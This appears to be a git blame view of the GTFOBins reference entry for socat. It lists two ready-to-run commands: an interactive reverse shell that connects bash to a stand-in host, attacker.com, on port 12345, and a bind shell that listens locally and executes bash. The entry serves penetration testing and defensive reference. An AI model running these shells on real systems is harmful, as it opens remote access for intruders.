GTFOBins.github.io/_gtfobins/socat.md

15 lines
595 B
Markdown
Raw Normal View History

2018-05-22 22:40:27 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
2018-05-22 22:40:27 +02:00
code: |
2018-05-24 21:59:21 +02:00
RHOST=attacker.com
2018-05-25 01:10:39 +02:00
RPORT=12345
2018-05-22 22:40:27 +02:00
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
2018-05-25 15:30:02 +02:00
bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
2018-05-23 21:24:08 +02:00
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
2018-05-25 01:10:39 +02:00
---